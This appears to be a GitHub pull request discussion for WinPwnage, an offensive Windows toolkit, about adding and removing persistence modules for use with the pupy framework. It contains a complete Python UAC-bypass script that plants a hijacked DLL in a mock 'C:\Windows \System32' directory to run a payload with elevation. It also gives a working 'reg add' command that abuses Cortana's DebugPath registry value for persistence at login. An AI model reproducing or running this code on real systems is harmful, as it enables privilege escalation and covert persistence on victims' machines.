### PR TITLE
Persistence

### PR DESCRIPTION
**Pull request by AlessandroZ**
Hi,

Sorry to change so much your code but I needed some functionality to use the persistence module. I needed to be able to use a custom name (not the one you have hard coded to the code), and the possibility to be able to remove the persistence from the disk. 
So I have changed some code, but everything has been tested (except the dll hijacking with explorer.exe) and worked well. I have added a new way to persist for non admin user. 

If you have any question on the code, do not hesitate to ask. 
I have spend some time debugging the wmic and mof modules because it does not work at first. That's why I have added the way to retrieve the exit code to check if everything worked well or not. 

Have a nice day.

### CODE REVIEW

**Comment by rootm0s** [comment]
Also, a question why in scanner.py the function().run() returns False when finished

**Comment by AlessandroZ** [comment]
Hi, 

I wont't change anything for you (except if you change your main function), and for me, I could be able to call the tool like that: 
- add persistence
`function(uac=False, persist=True).run(id=method, payload=cmd, name=name, add=True)`
- remove persistence
`function(uac=False, persist=True).run(id=method, payload='', name=name, add=False)`

So I will be able to add / remove persistence and to use a custom name to create files / keys / etc. (depending on the persistence method).
 
For the return to False, I don't know why I have added this. You can remove it.

**Comment by rootm0s** [comment]
Alright, thanks for the explanation. Will merge PR

**Comment by AlessandroZ** [comment]
Thanks for the merge. 

I have seen that you worked on bypassing using mocking trusted directories. Before you push, I had played as well without taking to long time. It worked on Windows 8.1 but not Windows 10, another binary has to be find. 
But just to let you know, here is my code: 
```
# Technique from David Wells
# https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e
import os
import time
from ctypes import (
	WinDLL, c_wchar_p, c_uint32, c_void_p, POINTER, Structure, c_ulong, c_int, WinError, sizeof, byref
)

from ctypes.wintypes import (
	BOOL, LPSTR, BYTE, HWND, HANDLE, HKEY, HINSTANCE
)

import shutil

LPWSTR = c_wchar_p
LPVOID = c_void_p
DWORD = c_uint32
SW_HIDE = 0
SW_SHOW = 5
SEE_MASK_NOCLOSEPROCESS = 0x00000040

class ShellExecuteInfoW(Structure):
	_fields_ = [
		('cbSize',          DWORD),
		('fMask',           c_ulong),
		('hwnd',            HWND),
		('lpVerb',          LPWSTR),
		('lpFile',          LPWSTR),
		('lpParameters',    LPWSTR),
		('lpDirectory',     LPWSTR),
		('nShow',           c_int),
		('hInstApp',        HINSTANCE),
		('lpIDList',        LPVOID),
		('lpClass',         LPWSTR),
		('hKeyClass',       HKEY),
		('dwHotKey',        DWORD),
		('hIcon',           HANDLE),
		('hProcess',        HANDLE)
	]
PShellExecuteInfoW = POINTER(ShellExecuteInfoW)

shell32 = WinDLL('shell32', use_last_error=True)

ShellExecuteEx = shell32.ShellExecuteExW
ShellExecuteEx.argtypes = [PShellExecuteInfoW]
ShellExecuteEx.restype = BOOL

def create_dir(directory):
	try:
		os.makedirs(directory)
		return True
	except OSError as e:
		# File already exists : ok 
		if e.winerror == 183:
			return True

def copy_file(src, dst):
	shutil.copyfile(src, dst)
	if os.path.exists(dst):
		return True

def remove(file): 
	try:
		if os.path.isfile(file):
			os.remove(file)
		elif os.path.isdir(file):
			shutil.rmtree(file)
	except Exception:
		return False

def main(payload):
	# Possible bins

	# Not worked on my tests
	# mkdir "\\?\C:\Windows "
	# mkdir "\\?\C:\Windows \System32"
	# copy c:\Windows\system32\fodhelper.exe "c:\Windows \System32\"
	# copy [your DLL] "C:\Windows \System32\PROPSYS.dll"
	# "c:\windows \system32\fodhelper.exe"

	# Not worked on my tests
	# elevated_process = u'winSAT.exe'
	# dll_hijacked = u'WINMM.dll'
	# params = u'formal'

	# Worked on Win 8.1
	elevated_process = u'cliconfg.exe'
	dll_hijacked = u'NTWDBLIB.dll'
	params = u''

	# Mock SystemRoot Directory
	mock_windir = '\\\\?\\C:\\Windows \\'
	mock_sysdir = '\\\\?\\C:\\Windows \\System32\\'
	fake_sysdir = 'C:\\Windows \\System32\\'
	sysdir = 'C:\\Windows\\System32\\'

	if create_dir(mock_windir):
		if create_dir(mock_sysdir):
			if copy_file(os.path.join(sysdir, elevated_process), os.path.join(mock_sysdir, elevated_process)):
				if copy_file(payload, os.path.join(mock_sysdir, dll_hijacked)):
					shinfo = ShellExecuteInfoW()
					shinfo.cbSize = sizeof(shinfo)
					shinfo.fMask = SEE_MASK_NOCLOSEPROCESS
					shinfo.lpFile = os.path.join(fake_sysdir, elevated_process)
					shinfo.nShow = SW_HIDE
					shinfo.lpParameters = params
					if not ShellExecuteEx(byref(shinfo)):
						raise WinError()

	time.sleep(5)
	
	# Clean everything
	remove(os.path.join(mock_sysdir, elevated_process))
	remove(os.path.join(mock_sysdir, dll_hijacked))
	remove(mock_sysdir)
	remove(mock_windir)
```

And here is another interesting way to persist: https://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx/

Have a nice day.

**Comment by rootm0s** [comment]
Yeah i started to play around with it, got it working on Win10 when exporting the same functions the real dll file expects to import.

**Comment by rootm0s** [comment]
And another question, how do you call the uac bypasses? the same as persistence?

`function(uac=True, persist=False).run(id="02", payload="c:\\test.exe")`

**Comment by rootm0s** [comment]
It didnt work, but i guess it got fixed now with the fix PR

**Comment by rootm0s** [comment]
@AlessandroZ 

> And here is another interesting way to persist: https://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx/

Looked into it, the only problem i encountered is when Cortana or People app versions are changed, the payload does not start at login.

Need to search the registry to identify what version of Cortana and People app which is running on the system. Once that's done, we can just add the registry changes in order to add payload at startup.

The versions seems to be different on each build Microsoft releases, I did tests on Win 10 1703 (build: 15063) which this line works fine on:
`reg add HKCU\Software\Classes\ActivatableClasses\Package\Microsoft.Windows.Cortana_1.8.12.15063_neutral_neutral_cw5n1h2txyewy\DebugInformation\CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca /v DebugPath /d "C:\windows\system32\cmd.exe"`

**Comment by AlessandroZ** [comment]
On my system, the registry key is `Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy`
This could be retrieved looking for a key starting with `Microsoft.Windows.Cortana_` but I don't know if the value `CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca` depends on the system. It seems to work using this exact value on your system, so I guess, it should work on many systems no matter the build version.

**Comment by rootm0s** [comment]
Yeah, gonna look into it more. Searching for Microsoft.Windows.Cortana_ would work, and i dont think the Appx value does matter, from the tests so far

**Comment by rootm0s** [comment]
If possible, can you test if this works [persistence_cortana.py](https://github.com/rootm0s/WinPwnage/blob/master/todo/persistence_cortana.py)

Tested on Windows 10 15063 and 17134, both of them worked.

**Comment by AlessandroZ** [comment]
I have tested it on my Windows 10 and it worked. 
Just do not put the custom name as parameter [here](https://github.com/rootm0s/WinPwnage/blob/master/todo/persistence_cortana.py#L38) because a custom name cannot be used so it won't work with pupy then :). Call the function with an empty name like that: 
`def persistence_cortana_appx(payload, name='', add=True)`

And hardcode the key value: 
`if registry().modify_key(hkey="hkcu", path=kpath, name="DebugPath",...` 

And if you want, instead of doing a [while True](https://github.com/rootm0s/WinPwnage/blob/master/todo/persistence_cortana.py#L29) you could request the registry like that (and adding a break when found): 
```
num = _winreg.QueryInfoKey(key)[0]
for x in range(0, num):
    if "Microsoft.Windows.Cortana_" in _winreg.EnumKey(key, x):
        ....
        break
```
but the code works, so it's up to you, if you want to change it :)

**Comment by rootm0s** [comment]
Thanks for testing and the input!

Updated the code now, should work on pupy now.(https://github.com/rootm0s/WinPwnage/blob/master/todo/persistence_cortana.py)

**Comment by rootm0s** [comment]
And a question, when it comes to the persistence modules, it doesn't really makes sense from the wrapper to call "name" since it's not needed at all  `def fax_dll(payload, name='', add=True):` Would it be possible to make `name=""` optional?

I know you mentioned something about pupy needing it, but I dont get why since sometimes you cannot change the name at all, if you do, it render the attack vector useless.

**Comment by AlessandroZ** [comment]
Sure, you can do it [here](https://github.com/rootm0s/WinPwnage/blob/master/winpwnage/core/scanner.py#L107). 
`f.__code__.co_varnames` returns the parameters passed to the function. So you should manage all cases: 
```
if 'name' in f.__code__.co_varnames and 'add' in f.__code__.co_varnames:
	f(payload, name=kwargs.get('name', ''), add=kwargs.get('add', True))
elif 'name' not in f.__code__.co_varnames and 'add' in f.__code__.co_varnames:
	f(payload, add=kwargs.get('add', True))
else:
	f(payload)
```
Then you could remove all `name=""` when not used. 

Try it, but it should work.

**Comment by rootm0s** [comment]
Thanks! The modules that supports custom names, still have the `name=""` so pupy can use them as well.  Just gonna let the wrapper skip  `name=""` by adding a static name for those who need a custom name.

**Comment by AlessandroZ** [comment]
Cool, thanks !

**Pull request merged**
